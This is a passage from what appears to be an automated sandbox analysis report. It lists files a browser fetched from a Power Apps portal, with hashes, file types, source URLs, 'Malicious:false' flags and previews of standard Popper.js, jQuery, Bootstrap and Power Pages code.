                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (61934), with no line terminators
                                        Category:downloaded
                                        Size (bytes):539944
                                        Entropy (8bit):5.5427861103174925
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:28DB771C66BD492EB3472BBB886632AC
                                        SHA1:6239E25EEE9D9C9D5913BDCA6099111C5D874107
                                        SHA-256:45F3159864A1461118ED1B63A19227A2E3D9A58EBEDEFEF517F333E6BD4FD9CC
                                        SHA-512:A912E670B94647CA55C1D3C92C1850E3820D3A2387DA3746BF1D0E51556931BAB7C66E1907A28DA199F52E8E26463737ED5B5CA36FDC65ADE95D1DA3A2F44FDB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/203.03a7694df4.chunk.js
                                        Preview:(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[203,90],{6815:(e,t,n)=>{"use strict";n.d(t,{s:()=>o});var r=n(5136);function o(e,t,n){void 0===n&&(n=!0);var o=!1;if(e&&t)if(n)if(e===t)o=!0;else for(o=!1;t;){var i=(0,r.P)(t);if(i===e){o=!0;break}t=i}else e.contains&&(o=e.contains(t));return o}},8715:(e,t,n)=>{"use strict";n.d(t,{w:()=>o});var r=n(5136);function o(e,t,n){return null!=n||(n=document),e&&e!==n.body?t(e)?e:o((0,r.P)(e),t):null}},5136:(e,t,n)=>{"use strict";function r(e,t){return void 0===t&&(t=!0),e&&(t&&function(e){var t,n;return e&&(n=e)&&n._virtual&&(t=e._virtual.parent),t}(e)||e.parentNode&&e.parentNode)}n.d(t,{P:()=>r})},3539:(e,t,n)=>{"use strict";n.d(t,{s:()=>i});var r=n(8715),o=n(6718);function i(e,t,n){var i=(0,r.w)(e,(function(e){return t===e||e.hasAttribute(o.r)}),n);return null!==i&&i.hasAttribute(o.r)}},6718:(e,t,n)=>{"use strict";n.d(t,{V:()=>o,r:()=>r});var r="data-portal-element";function o(e){e.setAttribu
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (540), with no line terminators
                                        Category:downloaded
                                        Size (bytes):540
                                        Entropy (8bit):5.0135089870329255
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2739C60227F87D19F5C784BFFB5991F8
                                        SHA1:42DBAC51553D7778A176E710D3CE1009884DE167
                                        SHA-256:974FECBEBCF2F295348C3631FE069966EAB4B4B57CD4FCBE15FB70D0ACAB47C6
                                        SHA-512:42C81F41962FE4B5FA556EEDF1C9D9CB2F1D9D182D7BF29E2F8D69BE2CA5553E10D89893D4B8699D1E60FDAB19D1C5D9BC9C686C6C2DBC58DAB85070D43596CD
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/pwa-style.bundle-2739c60227.css
                                        Preview:#offlineNotificationBar{padding-top:10px;padding-bottom:10px;background:#fff4ce}#message{position:relative;font-family:Segoe UI;font-style:normal;font-weight:600;font-size:12px;line-height:133%;color:#323130}html[dir=rtl] #message{right:36px;margin-left:64px}html[dir=ltr] #message{left:36px;margin-right:64px}#web{position:absolute;line-height:100%}html[dir=rtl] #web{right:12px}html[dir=ltr] #web{left:12px}#close{position:absolute;line-height:100%;display:flex;cursor:pointer}html[dir=rtl] #close{left:8px}html[dir=ltr] #close{right:8px}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (64184)
                                        Category:downloaded
                                        Size (bytes):123137
                                        Entropy (8bit):5.264209559921666
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:76D43A9405CE1A4618FF0A86BECBA682
                                        SHA1:556ACEAE8396531440488D48302636CB02288CBC
                                        SHA-256:D636393DA268FA543FC3F05A5405E53E26BF4101EA929ECCD401707B5A6C75B4
                                        SHA-512:2BEFC43D0F4FC8B6E055ADB458DC07782EBF55FAE1E5C69CD03A8A6744D735180D56AABAF315743979511EF911C58167DD3D1890716D9EAE316604957C7A65C5
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/867.0578a1c628.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[867],{7121:e=>{./*.object-assign.(c) Sindre Sorhus.@license MIT.*/.var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,r=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map((function(e){return t[e]})).join(""))return!1;var r={};return"abcdefghijklmnopqrst".split("").forEach((function(e){r[e]=e})),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},r)).join("")}catch(e){return!1}}()?Object.assign:function(e,l){for(var i,a,o=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),u=1;u<arguments.length;u++){for(var c in i=Object(arguments[u]))n.call(i,c)&&(o[c]=i[c
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max compression, from TOPS/20, original size modulo 2^32 115300
                                        Category:downloaded
                                        Size (bytes):20950
                                        Entropy (8bit):7.987621309051103
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D6C6353E89DF5EF986113DCE402F1DED
                                        SHA1:0A814E246DCC6613F99F6088E146A9C2EE710ADB
                                        SHA-256:4D7B82B2DD9AECBF61EF50A43C370C83D0B405FBCC85F5BE4564BCA7943956AE
                                        SHA-512:5E81A7AEC00A909C0ACEFE2F573DCC1BA1B4385D3406FF8C07F5A91D78C2874F5FCF6C1D199F8AD6507259FAF82F4AF6DA98BF9B2A4D241382996E14702F71D9
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/dist/preform.BootstrapV5.bundle-3a81cbc08f.css
                                        Preview:...........}k................~0.wG.}V...Z.....H.Mh@....i1..~..._r.YU@..@w..m..P.........X.u.p,.C}>.I..n./..V.x..,N.$..yQ^..^....(.....?.U.gI.*.....1A..&...wyvH..}.....Y...Oa.....:;Ti..#.)b?..k.....,N7.f...}.......*.o..Y..j.O..=.j.}r..^..7y1RK..A+9...6...d3.N......0Vu.@L.Z....V..o.N.....h@'9I7:...Vr.K".4.5.......l..|,'.y.....:...... .....t[_O.l..d.t.n.+.....v.>...O...Q....v.}|..?......~..i...c......(....f.......e....:..'........X].}{....&......J.....&.....v....g.mZ..bD..yz}(..c..8).#..!.3N...:....:/6.W..S..J..9c...w..t....4....>;...b...<..1.^..3G5.d-X......ML.Q..m..t.o....Z.l..l....P_...J.hv.....XTY...u.f...:OX....9...u.....:.%#D..a...[E`n..l6.Gq....u4........!.[I2..'..ew..=...]....^........h..g_...l..|Zo^...U.$v...r<.h^..b.Ou.j.z.R...g.BA.`'..g@.....<...l...9..7....{...z.F..?w.{.S .....a0U.6.Dl..8.l.d.(gy.....z2...U...Ol...|...u......2e....cN..Z..c?.'4..i....~.tD...)....K.......L7.X...).G+y.|..$$@J>{N_..a....).a..?...6}..4}.....3.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):2501
                                        Entropy (8bit):7.879469465067544
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3F579EFDBDB3C487F78849D59C08E8E9
                                        SHA1:6707549C7B1F2BF51382708B912E8A60C754A424
                                        SHA-256:A66577109EE2BC62376DCA4968DC33D9C74312A3441CEC2136930B26C9B09B71
                                        SHA-512:0B4E945B69ADDE27A05A62487A160455AEBBED4499BDF3A7F4A0E4684045A58BDB3EAB3222D3551CCF42F8197A19BB09417EA0C195BDDBCC2623D3D63D2A6E9D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR..............m"H....PLTE.....$DDDMMM;;;...........................888....,6,,,...333.EK...........&....)/.7>......@@@.SU......ggg...YYY....................\\\www.......kj........]b.:D....MR..........ps.cb....0@.yw!!!.uz........C....IDATx...w.:...u.Pb.(J;a..tsf:....7..$P.p) ..9......MP$. .. .. .. .. .. .. .....^.e.l.%./|.i7....;.U...:wv....1,.#..fv?.}Y.I.=..E.......,..v....E..m.8...;..G.E.".......2.N..c.[.rB.,S...2]5w._......+[.......~.Z......l;............1..v......m....)\..pC.8.NBCB.d.c..Q.|...N..+......T0lg...-Sje..".y..KG.....7$C.kTe ^.!.N.....a..R.0./..8....dH....2$....xa.d.Wc ^.!..@.@...4$.B..2.....+.R..K....*........7|....)FG.........Ys.B.h ..g|....D..O.@<.g.%"ZZ.(.np ....f.Y....j ..Z.x..v.%..hi.^..7..D..y...p.C..9...P..?^_FW.V..vcE.Y?.-....5..S. ....z..Mr]....9....6.(..:._{[=x{.|(.cu.b./.6f8....).-..oA.T.......&...~.....q...}yz......n=.....Y..a<.^.....gGB54d.1.=t.!.0.W1k..B.....`.........4.^...!_
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4807
                                        Entropy (8bit):4.941343369031878
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:633E70F51B5C0319AF3ACF16EC1AE7B6
                                        SHA1:D28238721914C98998ACC0485CCEBF230F01A520
                                        SHA-256:FB076F7948CA70EB1F51334FE4C473C40BBE3BCEB105981C482BB8634FF98081
                                        SHA-512:1509681E13367F0264CC341C1752B9EF7FFE0714098615282DB2B3688C24AF50D1052421DD606FCFCF942C0BE2D59B7694FA59150923F427FCD807530C56998A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.//// Wrapper class for client logger for below purposes..//// 1. Abstracting CST framework code from manual trace log APIs. ..//// 2. Constrolling instantiation of CST framework code in clientLogger.js based on whether telemetry is enabled..class ClientLogWrapper {...../// Constructor which also creates an instance of actual logger if telemetry is enabled...constructor() {....try {.....if (Helper.isTelemetryEnabled()) {......ClientLogger.getLogger();.....}....}....catch (exception) {.....console.warn(exception);....}...}...../// Gets the client log wrapper. Creates new instance if not already created...static getLogger() {....if (!window.clientLogWrapper) {.....window.clientLogWrapper = new ClientLogWrapper();....}......return window.clientLogWrapper;...}...../// Trace info log.../// For component, subComponent, action, tag, it is recommended to use standard short and crisp one worder string..../// Examples:.../// for component: entity_grid, entity_form etc.../// For SubComponent: f
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 10 x 10, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):237
                                        Entropy (8bit):6.43867499964275
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:74710B068526106916E5A9AE5B70FA64
                                        SHA1:2E7344458A5EB6EFB65976EE144BBEDBA680B5AC
                                        SHA-256:55B9B171BB9BC15ACDD21C7A186E1268BC774B6A7C5A6FBC2F2BFEE564890325
                                        SHA-512:6D66F49A52C8A4E0EEB0C4F67DC85CAFEE5C2F8716E8E80EB5BE6C266F4E7CFC161EA5B0937A383BA13B1DD5B97742D70FA9630A502F87BE622FF0512BA63047
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/img/close.png
                                        Preview:.PNG........IHDR..............2.....pHYs.................sRGB.........gAMA......a.....IDATx...... ...(./K vd........v........!.`?p.......]'g.."...,6%..`gC..%`s.$"..<...=....e..4X.._kQ...e..h.-.}...3=.e/.D..C....ob41.x.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (445), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6941
                                        Entropy (8bit):4.704312270298095
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:96EBF1698BF732A2CA43C38F764AA3CA
                                        SHA1:0A6CB3CB46786A61685048B6BA0BF34D9515E35F
                                        SHA-256:5C56A97B3C2971E0CDA01C59EFF6C693EA32C30569596EC851FACABC99622C2A
                                        SHA-512:C8CE0FBF4ABD804886E9A7CA59D5E586E9492F52F4A9BC63470EE1752C2512DFDF0DE6DB6298F184AA3039E70A7CB5E21D06DB47292FBF25AA702EEF8969ADDF
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Roadster Enthusiasts - bizblitzed.com.de</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.54aCJmSrWpXPKBaXc-XNLwHaFR') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;.. tex
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:downloaded
                                        Size (bytes):276202
                                        Entropy (8bit):5.168658153136609
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1597BEB8EAA9D60D8E78B2293135C7CB
                                        SHA1:5B56F46804E52FEB1FE19347AB4A2F9E8E2B091C
                                        SHA-256:4C92ACD98BE37C683149DA44E3145BB61B933400C1A32AC57DF2C9358E26EEE6
                                        SHA-512:E64EB2DD536BBF57EFE2BCE250C9A1B1A6841FE89AAE6F10FD4B6F70B165A9595B6EA11DF063A68E11CD59C646AF29F50637C8A7544F655AC4F5398538FD5313
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/app.BootstrapV5.bundle-1597beb8ea.js
                                        Preview:(function(w){function c(e){this._element=w(e);this._target=this._element.data("bsTarget")||{};this._attachmentSettings=this._element.data("attachmentsettings");this._serviceUrlGet=this._element.attr("data-url-get");this._serviceUrlAdd=this._element.attr("data-url-add");this._serviceUrlEdit=this._element.attr("data-url-edit");this._serviceUrlDelete=this._element.attr("data-url-delete");this._serviceUrlGetAttachments=this._element.attr("data-url-get-attachments");this._serviceUrlGetAttachmentsCount=this._element.attr("data-url-get-attachments-count");this._hideFieldLabel=this._element.attr("data-hide-field-label");this._attachmentAcceptTypes=this._element.attr("data-add-accept-types");this._addEnabled=this._element.data("add-enabled");this._editEnabled=this._element.data("edit-enabled");this._deleteEnabled=this._element.data("delete-enabled");this._isRTEEnabled=this._element.data("rte-enabled");this._isTimeLine=this._element.data("is-timeline");this._pageSize=this._element.attr("data-pag
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (65445)
                                        Category:dropped
                                        Size (bytes):540048
                                        Entropy (8bit):5.302089229352873
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CF8E0FD9421E12CFB59F0266E0273F7D
                                        SHA1:62EF88B36C4A8C0475E10DFD80A4F7E588AA1F15
                                        SHA-256:522C2E27DB64974813E59251D101596A7692A9B964771A9CE3F1978247862258
                                        SHA-512:224B4823B23AC17E328194A285B48FCE4244D2649E66CCC9A7DFBC8AFD8AEA5C1E1D4A5AEFF181734DB48F5FDC407EA3ABDF66362912E6EE520CBB01C9BFDA18
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! jQuery v3.6.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(k,e){"use strict";var t=[],n=Object.getPrototypeOf,a=t.slice,m=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},l=t.push,s=t.indexOf,i={},r=i.toString,g=i.hasOwnProperty,o=g.toString,u=o.call(Object),v={},y=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},_=function(e){return null!=e&&e===e.window},D=k.document,h={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,i){var n,s,r=(i=i||D).createElement("script");if(r.text=e,t)for(n in h)(s=t[n]||t.getAttribute&&t.getAttribute(n))&&r.setAttribute(n,s);i.head.appendChild(r).parentNode.removeChild(r)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (6203)
                                        Category:downloaded
                                        Size (bytes):7604
                                        Entropy (8bit):5.300961596455194
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F1ACFD2815BECD7DF8E02C415B9973F7
                                        SHA1:3CF9577A5B4CBA69C9646967B8855F7A2F137F80
                                        SHA-256:99A2179570F5B6A4388F0175165C32018D8078E6F97F1591CF3426538361B4D7
                                        SHA-512:14814E77F88AE5AB750D2D72A447F931FCBF8DB2AA95E77D91E7473C0982BA49FF9983DF6E137A52FFEDE3C490C6BA8948D411C3FCCFF2EDE561C21533690074
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/874.d64d28bc67.chunk.js
                                        Preview:"use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[874,493],{7121:e=>{./*.object-assign.(c) Sindre Sorhus.@license MIT.*/.var r=Object.getOwnPropertySymbols,t=Object.prototype.hasOwnProperty,n=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var r={},t=0;t<10;t++)r["_"+String.fromCharCode(t)]=t;if("0123456789"!==Object.getOwnPropertyNames(r).map((function(e){return r[e]})).join(""))return!1;var n={};return"abcdefghijklmnopqrst".split("").forEach((function(e){n[e]=e})),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},n)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var u,c,f=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),l=1;l<arguments.length;l++){for(var i in u=Object(arguments[l]))t.call(u,i)&&(f[i]
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):290
                                        Entropy (8bit):4.281870632593913
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:752F259C0A7080B53B0081CB12C65E54
                                        SHA1:7B3E9527173B963CA6BDC06AFF7E2E71BE009BF8
                                        SHA-256:F749DA4F0A1EA6E6DD17E5732F37616D18A92082DE9D9A71BA4C4736CB263743
                                        SHA-512:4711373D19F39A652AB6182F587B7EEE06813639FBCC29A6A443CCC7E70FEAA9A47E29878E0BAFBF4230B52635B08A86738C8F3460DB541073F597067432CC5A
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/data_grid/manifest-0.2.18.json
                                        Preview:{. "Grid": {. "library": "data_grid",. "remoteEntry": "/data_grid/remoteEntry.5cc877d6cf.js",. "control": "./Grid". },. "Form": {. "library": "data_grid",. "remoteEntry": "/data_grid/remoteEntry.5cc877d6cf.js",. "control": "./Form". }.}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (32065)
                                        Category:downloaded
                                        Size (bytes):85578
                                        Entropy (8bit):5.366055229017455
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (361), with no line terminators
                                        Category:dropped
                                        Size (bytes):361
                                        Entropy (8bit):4.6743574635866665
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EDA4E638FDD1B8DE8F97EC781E8242D6
                                        SHA1:A8C0716A4BCCF2805899403AF14E7B9216B19573
                                        SHA-256:5423F185195F046D0F3893F674E072BE43E47C6124DD6CCBE214E896B1944D43
                                        SHA-512:6B0BBB532CA0F901059517960261C0C6E1577B31F4E207C3909ABA5FA0D64E03C18E5EEE10F8A6773A4870CDFC3F0D642F761C8D8E7B6643D023161C23554BF2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:jQuery.timeago.settings.strings={prefixAgo:null,prefixFromNow:null,suffixAgo:"ago",suffixFromNow:"from now",seconds:"less than a minute",minute:"about a minute",minutes:"%d minutes",hour:"about an hour",hours:"about %d hours",day:"a day",days:"%d days",month:"about a month",months:"%d months",year:"about a year",years:"%d years",wordSeparator:" ",numbers:[]};
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65294), with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):92085
                                        Entropy (8bit):5.011925941956388
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BE8391E97DEA755C86C38DB4E43773D8
                                        SHA1:3E573E059A8C52A1B7063895562F6A23261F54A0
                                        SHA-256:BBB5F1A1DF8E94BE934B438B99E27173F2EC270005C7ABE07204BFE0DD64B134
                                        SHA-512:AB51CA9BDE0B02A96E34F1B1FEC7B8B5D3B688431C9ECF8EE26308E578A952EED1A067CFA8C09433645AD7FC287E72C09E2EF9B72724616F877B5915AD7D2056
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/bootstrap.BootstrapV5.bundle-be8391e97d.js
                                        Preview:/*!.. * Bootstrap v5.2.2 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..!function (t, e) { "object" == typeof exports && "undefined" != typeof module ? module.exports = e() : "function" == typeof define && define.amd ? define(e) : (t = "undefined" != typeof globalThis ? globalThis : t || self).bootstrap = e() }(this, (function () { "use strict"; const t = "transitionend", e = t => { let e = t.getAttribute("data-bs-target"); if (!e || "#" === e) { let i = t.getAttribute("href"); if (!i || !i.includes("#") && !i.startsWith(".")) return null; i.includes("#") && !i.startsWith("#") && (i = `#${i.split("#")[1]}`), e = i && "#" !== i ? i.trim() : null } return e }, i = t => { const i = e(t); return i && document.querySelector(i) ? i : null }, n = t => { const i = e(t); return i ? document.querySelector(i) : null }, s = e => {
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48664)
                                        Category:downloaded
                                        Size (bytes):48944
                                        Entropy (8bit):5.272507874206726
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (61300)
                                        Category:downloaded
                                        Size (bytes):164727
                                        Entropy (8bit):5.527686835651098
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:11A5A914937B75288F59799624B22C41
                                        SHA1:FA1304A3AAE266ECEEA76FF1BED1D2894DAF19F2
                                        SHA-256:0D123D26B7574F73FADFC2B904E098C4977CAFFFBA55A94F547ED5B23EBC4169
                                        SHA-512:51D67B6EC53CADDA946FFFA3BC82F3D5355E15407FDFF9EE9F01ABFAC91987EE1144016DB1BB15E9A502C1BE45D00CE25202D426707A8BC118627D2C37E2D811
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/postpreform.BootstrapV5.bundle-11a5a91493.js
                                        Preview:(function(e,a){var r=[];function n(t,r){var n=a.Deferred();(function e(){a.ajax(t).done(n.resolve).fail(function(){console.log("AjaxRetry attempt :".concat(r));r--;if(r>0){e()}else{n.rejectWith(this,arguments)}})})();return n.promise()}function t(){var e=a.Deferred();var t=a('#antiforgerytoken input[name="__RequestVerificationToken"]').val();if(!t){r.push(e);if(r.length===1){n({type:"GET",url:a("#antiforgerytoken").attr("data-url"),cache:false},3).done(function(e){a("#antiforgerytoken").empty().append(e);t=a('#antiforgerytoken input[name="__RequestVerificationToken"]').val();r.forEach(function(e){e.resolve(t)});r=[]}).fail(function(e){if(e&&e.responseText){var t="GetAntiForgeryToken failed".concat("Details: ",e.responseText);console.log(t);ClientLogWrapper.getLogger().traceError(t,"antiforgerytoken","","GetTokenDeferred")}r.forEach(function(e){e.reject()});r=[]})}}else{e.resolve(t)}return e.promise()}function i(){var e=a("#antiforgerytoken").attr("data-url");n({type:"GET",url:e,cache:f
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (54049)
                                        Category:dropped
                                        Size (bytes):54098
                                        Entropy (8bit):5.085819781103952
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:110C02AABA6D184B61982072646CAF33
                                        SHA1:5FB13C49228FD1A7597A4DE2AB57AE6F68233856
